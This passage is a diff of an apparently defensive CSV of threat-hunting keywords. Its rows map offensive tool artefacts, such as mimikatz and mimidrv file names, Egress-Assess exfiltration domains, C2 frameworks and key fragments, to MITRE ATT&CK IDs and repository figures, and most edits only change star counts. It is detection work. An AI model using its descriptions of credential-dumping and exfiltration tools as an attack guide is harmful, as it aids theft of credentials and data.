T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*microchsse.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microlilics.crabdance.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can 
be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*micronaoko.jumpingcrab.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
@@ -13553,54 +13711,54 @@ "*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimikatz -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Mimikatz.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*mimikatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*mimikatz_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_tashlib*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
